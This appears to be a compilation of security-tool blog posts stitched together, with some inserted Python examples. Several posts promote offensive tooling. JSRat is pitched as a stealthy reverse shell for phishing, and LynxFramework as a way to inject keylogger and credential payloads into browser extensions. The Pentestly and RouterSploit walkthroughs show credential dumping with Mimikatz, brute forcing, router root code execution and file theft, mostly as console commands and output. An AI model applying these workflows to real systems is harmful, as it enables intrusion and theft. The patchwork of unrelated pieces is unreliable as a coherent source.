The Pentest Checklist is an HTML document used for information management while conducting a pentest. The generated report provides the analyst with a list of hosts and their open ports along with space for note taking. This is still under development and provides basic functionality. The data is retrieved from the Gauntlet database. The "-T" flag can be used to display output from tools such as Nessus, but is very verbose.

Usage
usage: Guinevere.py [-h] [-H DB_HOST] [-U DB_USER] [-P DB_PASS] [-p DB_PORT]
[-l LINES] [-A] [-V] [-sC] [-sH] [-sM] [-sL] [-sI] [-aD]
[-T]

optional arguments:
-h, --help show this help message and exit
-H DB_HOST, --db-host DB_HOST
MySQL Database Host. Default set in script
-U DB_USER, --db-user DB_USER
MySQL Database Username. Default set in script
-P DB_PASS, --db-pass DB_PASS
MySQL Database Password. Default set in script
-p DB_PORT, --db-port DB_PORT
MySQL Database Port. Default set in script
-l LINES, --lines LINES
Number of lines to display when selecting an engagement. Default is 10
-A, --all-vulns Include all vulnerability headings when there are no associated report narratives
-V, --all-verb Include all vureto vulnerability verbiage when there are no associated report narratives
-sC Exclude Critical-Severity Vulnerabilities
-sH Exclude High-Severity Vulnerabilities
-sM Exclude Medium-Severity Vulnerabilities
-sL Include Low-Severity Vulnerabilities
-sI Include Informational-Severity Vulnerabilities
-aD, --assessment-date
Include the date when selecting an assessment to report on
-T, --tool-output Include Tool Output When Printing G-Checklist



Rack-Bug - Debugging Toolbar For Rack Applications Implemented As Middleware

Rack::Bug adds a diagnostics toolbar to Rack apps. When enabled, it injects a floating div allowing exploration of logging, database queries, template rendering times, etc.

Features
  • Password-based security
  • IP-based security
  • Rack::Bug instrumentation/reporting is broken up into panels.
    • Panels in default configuration:
      • Rails Info
      • Timer
      • Request Variables
      • SQL
      • Active Record
      • Cache
      • Templates
      • Log
      • Memory
    • Other bundled panels:
      • Redis
      • Sphinx
    • The API for adding your own panels is simple and powerful

Rails quick start
script/plugin install git://github.com/brynary/rack-bug.git
In config/environments/development.rb, add:
config.middleware.use "Rack::Bug",
:secret_key => "someverylongandveryhardtoguesspreferablyrandomstring"
Add the bookmarklet to your browser:
open http://RAILS_APP/__rack_bug__/bookmarklet.html

Using with non-Rails Rack apps
Just 'use Rack::Bug' as any other middleware. See the SampleApp in the spec/fixtures folder for an example Sinatra app.
If you wish to use the logger panel define the LOGGER constant that is a ruby Logger or ActiveSupport::BufferedLogger

Configuring custom panels
Specify the set of panels you want, in the order you want them to appear:
require "rack/bug"

ActionController::Dispatcher.middleware.use Rack::Bug,
:secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
:panel_classes => [
Rack::Bug::TimerPanel,
Rack::Bug::RequestVariablesPanel,
Rack::Bug::RedisPanel,
Rack::Bug::TemplatesPanel,
Rack::Bug::LogPanel,
Rack::Bug::MemoryPanel
]

Running Rack::Bug in staging or production
We have found that Rack::Bug is fast enough to run in production for specific troubleshooting efforts.

Configuration
Add the middleware configuration to an initializer or the appropriate environment files, taking the rest of this section into consideration.

Security
Restrict access to particular IP addresses:
require "ipaddr"

ActionController::Dispatcher.middleware.use "Rack::Bug",
:secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
:ip_masks => [IPAddr.new("2.2.2.2/0")]
Restrict access using a password:
ActionController::Dispatcher.middleware.use "Rack::Bug",
:secret_key => "someverylongandveryhardtoguesspreferablyrandomstring",
:password => "yourpassword"
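Note the mask in the first snippet: a prefix length of /0 keeps no address bits, so `2.2.2.2/0` matches every source address and restricts nothing; a single host needs /32. The following is an added example, not Rack::Bug's code, that reproduces that kind of check with Python's standard `ipaddress` module; `ip_allowed`, `check_masks` and the sample mask lists are assumptions.

```python
import ipaddress


def ip_allowed(ip_masks, remote_addr):
    """Return True when remote_addr falls inside at least one configured mask.

    Assumed semantics matching the intent of Rack::Bug's :ip_masks option.
    strict=False lets a host address carrying a prefix ("2.2.2.2/0") be
    accepted as a network, the way IPAddr.new does in Ruby; the host bits
    are simply masked off.
    """
    remote = ipaddress.ip_address(remote_addr)
    networks = [ipaddress.ip_network(mask, strict=False) for mask in ip_masks]
    return any(remote in net for net in networks)


# Constructed sample configurations for comparison.
WIDE_OPEN = ["2.2.2.2/0"]        # /0 becomes 0.0.0.0/0: every IPv4 source matches
SINGLE_HOST = ["2.2.2.2/32"]     # only that one address matches
OFFICE_RANGE = ["10.0.0.0/8", "192.168.1.0/24"]


def check_masks(ip_masks, candidates):
    """Return {source address: allowed?} for a list of source addresses."""
    return {addr: ip_allowed(ip_masks, addr) for addr in candidates}


if __name__ == "__main__":
    probes = ["2.2.2.2", "8.8.8.8", "192.168.1.77"]
    for label, masks in (("WIDE_OPEN", WIDE_OPEN), ("SINGLE_HOST", SINGLE_HOST),
                         ("OFFICE_RANGE", OFFICE_RANGE)):
        print(label, check_masks(masks, probes))
```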

Authors
  • Maintained by Bryan Helmkamp
  • Contributions from Luke Melia, Joey Aghion, Tim Connor, and more

Development
For development, you'll need to install the following gems: rspec, rack-test, webrat, sinatra


Meld - Visual Diff And Merge Tool Targeted At Developers


Meld is a visual diff and merge tool targeted at developers. Meld helps you compare files, directories, and version controlled projects. It provides two- and three-way comparison of both files and directories, and has support for many popular version control systems.

Meld helps you review code changes and understand patches. It might even help you to figure out what is going on in that merge you keep avoiding.

Features

File comparison

  • Edit files in-place, and your comparison updates on-the-fly
  • Perform two- and three-way diffs and merges
  • Easily navigate between differences and conflicts
  • Visualise global and local differences with insertions, changes and conflicts marked
  • Use the built-in regex text filtering to ignore uninteresting differences
  • Syntax highlighting

Directory comparison

  • Compare two or three directories file-by-file, showing new, missing, and altered files
  • Directly open file comparisons of any conflicting or differing files
  • Filter out files or directories to avoid seeing spurious differences
  • Simple file management is also available

Version control

  • Meld supports many version control systems, including Git, Mercurial, Bazaar and SVN
  • Launch file comparisons to check what changes were made, before you commit
  • View file versioning statuses
  • Simple version control actions are also available (i.e., commit/update/add/remove/delete files)

Merge mode (in development)

  • Automatically merge two files using a common ancestor
  • Mark and display the base version of all conflicting changes in the middle pane
  • Visualise and merge independent modifications of the same file
  • Lock down read-only merge bases to avoid mistakes
  • Command line interface for easy integration with existing tools, including git mergetool

Requirements

  • Python 2.7 (Python 3 not yet supported)
  • GTK+ 3.12 (3.14 in development)
  • GLib 2.36
  • PyGObject 3.8 (3.14 in development)
  • GtkSourceView 3.10 (3.14 in development)


PentestBox 2.0 - Portable Penetration Testing Distribution for Windows Environments


PentestBox provides all security tools as a single software package, eliminating the need for virtual machines or dual-boot environments on the Windows operating system.

It was created because more than 50% of penetration testing distribution users use Windows. [Source]

So it provides an efficient platform for penetration testing on the Windows platform.

There are two variants of PentestBox, one without Metasploit and one with Metasploit.

Antivirus software and firewalls need to be switched off to install and operate the version with Metasploit.

Download either variant by clicking the respective download button on the right side.

By default the installer extracts to C:/PentestBox/; for proper functioning, do not change this.

Easy To Use

It is a command-line utility, which is all you need. You can learn about the commands on tools.pentestbox.com.

Awesome Design

It is the same green font on a black terminal, but in a modern way.

Best Performance

PentestBox runs directly on the host machine instead of in a virtual machine, so the performance gain is obvious.

No Dependencies Needed

All the dependencies required by the tools are inside PentestBox, so you can run PentestBox even on a freshly installed Windows without any hassle.

Portable

PentestBox is entirely portable, so you can carry your own penetration testing environment on a USB stick. It takes care of the dependencies required to run the tools inside it.

Linux Environment

PentestBox contains nearly all Linux utilities, such as bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others. It even contains your favourite text editor, "vim". For the complete list, please look at tools.pentestbox.com/#linux-utilities.

Because of this, most of the pentesting tools that were previously compatible only with Linux work smoothly in PentestBox.

No Drivers Issue

Windows already has broad driver support for graphics cards and wireless adapters, so you don't have to worry about driver compatibility issues. For example, you can now use your GPU to crack hashes with Project RainbowCrack, which is not particularly compatible with Linux environments.

Modular

In making PentestBox we included only the best tools, but in that process we missed some tools you might want to use. In that case you can easily install them using the toolsmanager inside PentestBox, which can install, update and uninstall tools that are not shipped with PentestBox.

Less Memory Usage

PentestBox runs on the host machine without any need for a virtual machine, so it needs only 20 MB to launch, compared to at least 2 GB of RAM needed to run virtual-machine distributions.

Less Disk Usage

It is very light on disk as well: it takes less than a third of the space a Linux pentesting distro does.

InBuilt Browser

PentestBox contains a version of the Mozilla Firefox browser with nearly all security add-ons. For the complete list of add-ons, please click here.

Cool Update Feature

It contains an update feature through which you can keep your tools updated. To learn more about the update feature, please click here.

Can be shared on a network

Consider an environment where you want to use PentestBox on many computers, such as an office or lab. Instead of installing PentestBox on each computer, you can install it on one computer and share that folder as a drive with the other computers on the same network. Read about this feature here.



LynxFramework - Extension Exploitation Framework


LynxFramework is an exploitation tool for web browsers, offering a service specialised in browser extension development, namely for Google Chrome and soon Firefox. It works by injecting a script into the extension in order to retrieve targeted data.

 
Lynx Framework - Force download payload from Lynx Framework on Vimeo.

LAST ONLINE PAYLOAD

XSSKeylooger keylooger xss
ForceDownload force file download
paytoweb www.paytoweb.com
Paypal https://www.paypal.com/signin/
Facebook http://facebook.com


Firmwalker - Script for searching the extracted firmware file system for goodies!


A simple bash script for searching the extracted or mounted firmware file system.

It will search through the extracted or mounted firmware file system for things of interest such as:
  • etc/shadow and etc/passwd
  • list out the etc/ssl directory
  • search for SSL related files such as .pem, .crt, etc.
  • search for configuration files
  • look for script files
  • search for other .bin files
  • look for keywords such as admin, password, remote, etc.
  • search for common web servers used on IoT devices
  • search for common binaries such as ssh, tftp, dropbear, etc.
  • search for URLs, email addresses and IP addresses
  • NOTE: Some of the data written to the file may be quite verbose. In that case, the data can be reviewed and then deleted from the file if desired.
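As an added example, not firmwalker's own code, the Python script below performs the same kind of walk over an extracted rootfs and additionally flags accounts in etc/shadow that ship with a real password hash; the extension lists, keywords, regexes and the constructed sample rootfs are all assumptions made for the example.

```python
import os
import re
import tempfile

# Constructed lookup lists mirroring the categories listed above; they are
# assumptions for this example, not firmwalker's own search terms.
SYSTEM_FILES = ("etc/shadow", "etc/passwd")
SSL_EXT = (".pem", ".crt", ".cer", ".key")
CONFIG_EXT = (".conf", ".cfg", ".ini")
SCRIPT_EXT = (".sh",)
INTERESTING_BINARIES = ("ssh", "sshd", "dropbear", "tftp", "telnetd",
                        "lighttpd", "httpd", "boa", "goahead")
KEYWORDS = ("admin", "password", "remote", "secret")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def shadow_accounts(root):
    """Accounts in etc/shadow carrying a real hash, i.e. credentials baked into the image."""
    path = os.path.join(root, "etc", "shadow")
    if not os.path.isfile(path):
        return []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        rows = [line.rstrip("\n").split(":") for line in fh]
    return [r[0] for r in rows if len(r) >= 2 and r[1] not in ("", "*", "!", "!!", "x")]


def walk_rootfs(root, max_text=256 * 1024):
    """Scan an extracted or mounted firmware root and group findings by category."""
    f = {"system_files": [], "ssl": [], "config": [], "scripts": [], "bin_files": [],
         "binaries": [], "keywords": {}, "urls": set(), "emails": set(), "ips": set()}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            low = name.lower()
            if rel in SYSTEM_FILES or rel.startswith("etc/ssl/"):
                f["system_files"].append(rel)
            if low.endswith(SSL_EXT):
                f["ssl"].append(rel)
            if low.endswith(CONFIG_EXT):
                f["config"].append(rel)
            if low.endswith(SCRIPT_EXT):
                f["scripts"].append(rel)
            if low.endswith(".bin"):
                f["bin_files"].append(rel)
            if low in INTERESTING_BINARIES:
                f["binaries"].append(rel)
            # Grep only small, UTF-8 decodable text; ELF and other binaries are skipped.
            if os.path.islink(full) or os.path.getsize(full) > max_text:
                continue
            try:
                with open(full, "r", encoding="utf-8") as fh:
                    text = fh.read()
            except (UnicodeDecodeError, OSError):
                continue
            for kw in KEYWORDS:
                if kw in text.lower():
                    f["keywords"].setdefault(kw, []).append(rel)
            f["urls"].update(URL_RE.findall(text))
            f["emails"].update(EMAIL_RE.findall(text))
            f["ips"].update(IP_RE.findall(text))
    f["shadow_accounts"] = shadow_accounts(root)
    return f


def build_sample_rootfs(root):
    """Write a small constructed rootfs so the scanner can run offline."""
    samples = {
        "etc/passwd": "root:x:0:0:root:/root:/bin/sh\nnobody:x:99:99::/:/bin/false\n",
        "etc/shadow": "root:$1$CONSTRUCTED$hash:0:0:99999:7:::\nnobody:*:0:0:99999:7:::\n",
        "etc/ssl/server.pem": "-----BEGIN CERTIFICATE-----\nCONSTRUCTED\n-----END CERTIFICATE-----\n",
        "etc/lighttpd/lighttpd.conf": 'server.bind = "192.168.1.1"\nadmin.password = "changeme"\n',
        "etc/startup.sh": "#!/bin/sh\nwget http://updates.example.com/fw.bin\nmail support@example.com\n",
        "usr/sbin/dropbear": b"\x7fELF\xff\xfe\x00",  # not valid UTF-8, so never grepped
        "data/update.bin": b"\x00\x01\x02\x03",
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb" if isinstance(data, bytes) else "w") as fh:
            fh.write(data)


def demo():
    """Build the constructed rootfs in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_rootfs(tmp)
        return walk_rootfs(tmp)


if __name__ == "__main__":
    for category, hits in demo().items():
        print(f"{category}: {hits}")
```

Point `walk_rootfs` at a real extracted rootfs instead of the temp dir; like firmwalker, keep the script outside the tree it scans so it does not report itself.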

Usage
  • If you wish to use the static code analysis portion of the script, please install eslint: npm i -g eslint
  • ./firmwalker {path to root file system} {path for firmwalker.txt}
  • Example: ./firmwalker linksys/fmk/rootfs ../firmwalker.txt
  • A file firmwalker.txt will be created in the same directory as the script file unless you specify a different filename as the second argument
  • Do not put the firmwalker.sh file inside the directory to be searched, this will cause the script to search itself and the file it is creating
  • chmod 0700 firmwalker.sh

How to extend

Script created by Craig Smith and expanded by:
  • Athanasios Kostopoulos
  • misterch0c

Links


JSRat - Reverse HTTP Shell Using JavaScript


JSRat is a reverse HTTP shell written in JavaScript. JSRat uses rundll32.exe to load the JavaScript code from cmd, and an HTTP shell is returned when the code is executed. The special part is that after the cmd command runs, rundll32.exe remains in the background and continuously connects to the server. No file is written to disk during the whole process, which significantly enhances stealth.

Characteristics:

Obtains a reverse shell by using cmd to execute the code


Advantages:

  • It can avoid being killed
  • It’s easy to use
  • It’s relatively stealthy.

Exploitation:

Based on its characteristics and advantages, using JavaScript as a phishing payload can achieve an amazing effect.
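The traits described above (rundll32.exe running script rather than a DLL export, staying resident, and talking to the network) are what a defender would key on. The following is an added detection example, not part of JSRat or the original post: it triages constructed process-creation events; the event field names, the `javascript:` token check and the network-connection threshold are assumptions to tune against your own baseline.

```python
import re

# Constructed sample process-creation events in an EDR/Sysmon-like shape.
# These are not JSRat's command lines; the javascript: entry only stands in
# for any attempt to hand rundll32.exe script instead of a DLL export.
SAMPLE_EVENTS = [
    {"pid": 4312, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": 'rundll32.exe javascript:"CONSTRUCTED_PLACEHOLDER"',
     "net_conns": 37},
    {"pid": 4420, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "net_conns": 0},
    {"pid": 4511, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe",
     "net_conns": 12},
]

# First argument after the rundll32 image name, quoted or not, up to a comma
# (the entry-point separator) or whitespace.
FIRST_ARG_RE = re.compile(r'^\s*"?\S*?rundll32(?:\.exe)?"?\s+"?([^\s",]+)', re.IGNORECASE)


def rundll32_findings(event):
    """Return the reasons a rundll32 event deserves review (empty when it looks benign)."""
    if not event["image"].lower().endswith("rundll32.exe"):
        return []
    cmd = event["cmdline"]
    m = FIRST_ARG_RE.match(cmd)
    first_arg = m.group(1).lower() if m else ""
    loaded_dll = first_arg.endswith(".dll")
    reasons = []
    if "javascript:" in cmd.lower():
        reasons.append("script protocol handler passed to rundll32")
    if not loaded_dll:
        reasons.append("first argument is not a .dll path")
    if event["net_conns"] > 0 and not loaded_dll:
        # The post describes rundll32 staying resident and polling its server.
        reasons.append("network activity from a rundll32 that loaded no DLL")
    if event["parent"].lower().endswith("cmd.exe"):
        reasons.append("spawned by cmd.exe")
    return reasons


def triage(events):
    """Map pid -> reasons for every event that raised at least one finding."""
    flagged = {}
    for event in events:
        reasons = rundll32_findings(event)
        if reasons:
            flagged[event["pid"]] = reasons
    return flagged


if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

Legitimate rundll32 invocations that pass no .dll-suffixed first argument exist, so the "not a .dll path" reason alone is a weak signal; combine it with the script handler, parent and network reasons before alerting.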


Pentestly - Python and Powershell internal Penetration Testing Framework

Pentestly is a combination of expanding Python tools for use in penetration tests. The goal is to utilize a familiar user interface while making contributions to the framework easy with the power of Python.

Blog post: Pentestly Framework: When Pentesting Meets Python and Powershell
Author: @ctfhacker / Cory Duplantis

Demo

Current features
  • Import NMAP XML
  • Test SMB authentication using:
    • individual credentials
    • file containing credentials
    • null credentials
    • NTLM hash
  • Test local administrator privileges for successful SMB authentication
  • Identify readable SMB shares for valid credentials
  • Store Domain/Enterprise Admin account names
  • Determine location of running Domain Admin processes
  • Determine systems of logged in Domain Admins
  • Execute Powershell commands in memory and exfil results
  • Execute Mimikatz to gather plaintext password from memory ( Invoke-Mimikatz.ps1 )
  • Receive a command shell ( Powercat )
  • Receive a meterpreter session ( Invoke-Shellcode.ps1 )

Shoulders of Giants
Pentestly stands on the shoulders of giants. Below are the current tools utilized in Pentestly:

Install
git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Usage
Let's walk through several functions currently implemented.

Change workspace
[pentestly][default] > workspaces list

+------------+
| Workspaces |
+------------+
| default |
+------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Load from nmap
[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

Name      Current Value                     Required  Description
--------  --------------------------------  --------  -----------------------------------
FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Test logins
Use file with creds to test login
[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run
Use single username password
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
Use credentials over a small subset of IPs, i.e. over the 192.168.8.0/24 range found in the table
[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Gather Domain and Enterprise admins
[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

Name    Current Value  Required  Description
------  -------------  --------  ---------------------------------------------
SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2

Run mimikatz over IPs with executable rights
[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] Execution creds: domain\Admin:adminpassword@192.168.1.1
[*] Success! Admin.DA:p@$$w0rd - DOMAIN ADMIN!

Show local admins
[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | | nsportsman | password1! | zojix | | | True | True | login |
+---------------------------------------------------------------------------------------------------------------+

Show domain admins
[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
| host | access | username | password | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin | TheRealDA | </l33TPassword> | zojix | | | True | True | login |
+--------------------------------------------------------------------------------------------------------------------------+

Enumshares
[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Show new shares
[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid | host | username | readwrite | readonly | noaccess | module |
+-------------------------------------------------------------------------------------------------+
| 1 | 192.168.224.252 | Administrator | | ADMIN$,C,C$,Users | IPC$ | enumshares |
+-------------------------------------------------------------------------------------------------+

Find/Download interesting files
[pentestly][default][interesting_files] > show options

Name Current Value Required Description
------- ------------- -------- -----------
PATTERN (Groups.xml|Services.xml|Printers.xml|Drives.xml|DataSources.xml|ScheduledTasks.xml|unattend|important|passw|backup|setup).*[^dll][^exe]$ yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Can change the pattern to something a bit more specialized
[pentestly][default][interesting_files] > set pattern important.txt|super_secret
PATTERN => important.txt|super_secret
[pentestly][default][interesting_files] > show options

Name Current Value Required Description
------- ------------- -------- -----------
PATTERN important.txt|super_secret yes Regex pattern to look for in filenames
SOURCE default yes source of input (see 'show info' for details)
Execute and download found files
[pentestly][default][interesting_files] > run
[*] Administrator
[*] Execution creds: workgroup\Administrator:BadAdminPassword@192.168.224.252
[+] Match found! Downloading: Users\Administrator\Desktop\important.txt.txt
192.168.224.252-Users_Administrator_Desktop_important.txt.txt
[+] Match found! Downloading: Users\Administrator\Desktop\super_secret.txt
192.168.224.252-Users_Administrator_Desktop_super_secret.txt

Contributing
Creating new modules is easy in Pentestly. Begin with the code provided in skeleton.py :
from libs.pentestlymodule import PentestlyModule

class Module(PentestlyModule):

    meta = {
        'name': 'Your module name goes here',
        'author': 'Developer name goes here',
        'description': 'Description of the module goes here',
        'query': 'SQL QUERY whose result is passed to your module',
        'options': (
            # (option name, default value, required True/False, description)
            ('Option1', 'Default Value', True, 'Description of option'),
        ),
    }

    def module_pre(self):
        # Optional
        # Happens before your module
        pass

    def module_run(self, data):
        # Required
        # data is the result from the SQL query set in the options

        ### Few magic functions
        # self.query - Perform an SQL query on the internal database
        results = self.query("select * from pentestly_creds")

        # self.output - print default information to the user
        self.output("Performed an SQL query")
        self.output(results)

        # self.success - print a success message to the user
        self.success("Yay! We performed successful work")

    def module_post(self):
        # Optional
        # Happens after your module
        pass
The key points here are to fill the meta dict with the corresponding information as well as the module_run function for module functionality.
This script is then placed in the modules/ folder or in your personal ~/.pentestly/modules folder for portability.
Stay tuned for a detailed example script explanation in the coming weeks.

TODO
  • Implement secretsdump.py module
  • Add utility functions for database queries similar to creds , services
  • Rework draw_table function to have fixed width columns
  • Import credentials from Gladius
  • Implement GPP password search and decrypt module
  • Look into utilizing Invoke-Shellcode

Changelog

0.1.0 (2016-02-18)
Initial release



RouterSploit - Router Exploitation Framework


The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aid penetration testing operations:
  • exploits - modules that take advantage of identified vulnerabilities
  • creds - modules designed to test credentials against network services
  • scanners - modules that check whether the target is vulnerable to any exploit

Installation
sudo apt-get install python-requests python-paramiko python-netsnmp
git clone https://github.com/reverse-shell/routersploit
./rsf.py

Usage
root@kalidev:~/git/routersploit# ./rsf.py 
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
Router Exploitation Framework |_|

Dev Team : Marcin Bury (lucyoa) & Mariusz Kupidura (fwkz)
Codename : Wildest Dreams
Version : 1.0.0

rsf >

1. Exploits

Pick the module
rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >
You can use the Tab key for completion.

Options
Display module options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options

Target options:


Name    Current settings  Description
----    ----------------  -----------
target                    Target address e.g. http://192.168.1.1
port    80                Target Port
Set options:
rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1
[+] {'target': 'http://192.168.1.1'}

Run module
Exploiting the target is done by issuing the 'run' or 'exploit' command:
rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root
It is also possible to check whether the target is vulnerable to a particular exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable

Info
Display information about the exploit:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003

2. Creds

Pick module
Modules located under the creds/ directory allow running dictionary attacks against various network services.
The following services are currently supported:
  • ftp
  • ssh
  • telnet
  • http basic auth
  • http form auth
  • snmp
Every service is divided into two modules:
  • default (e.g. ssh_default) - these modules use one wordlist of default credential pairs (login:password). The module can be used quickly and, in a matter of seconds, verifies whether the device uses default credentials.
  • bruteforce (e.g. ssh_bruteforce) - these modules perform dictionary attacks against a specified account or list of accounts. They take two parameters, login and password. Each value can be a single word (e.g. 'admin') or an entire list of strings (file:///root/users.txt).
Console:
rsf > use creds/
creds/ftp_bruteforce creds/http_basic_bruteforce creds/http_form_bruteforce creds/snmp_bruteforce creds/ssh_default creds/telnet_default
creds/ftp_default creds/http_basic_default creds/http_form_default creds/ssh_bruteforce creds/telnet_bruteforce
rsf > use creds/ssh_default
rsf (SSH Default Creds) >

Options
rsf (SSH Default Creds) > show options

Target options:

Name    Current settings  Description
----    ----------------  -----------
target                    Target IP address
port    22                Target port


Module options:

Name      Current settings                                               Description
----      ----------------                                               -----------
threads   8                                                              Numbers of threads
defaults  file:///root/git/routersploit/routersploit/wordlists/defaults.txt  User:Pass or file with default credentials (file://)
Set target:
rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}

Run module
rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'

(..)

Elapsed time: 38.9181981087 seconds
[+] Credentials found!

Login Password
----- --------
admin 1234

rsf (SSH Default Creds) >

3. Scanners
Scanners allow you to quickly verify whether the target is vulnerable to any exploits.

Pick module
rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

Options
Target options:

Name    Current settings  Description
----    ----------------  -----------
target                    Target address e.g. http://192.168.1.1
port    80                Target port
Set target:
rsf (D-Link Scanner) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}

Run module
rsf (D-Link Scanner) > run
[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!
- exploits/dlink/dwr_932_info_disclosure
It has been verified that the target is vulnerable to the dwr_932_info_disclosure exploit. Now use the proper module and exploit the target.
rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success

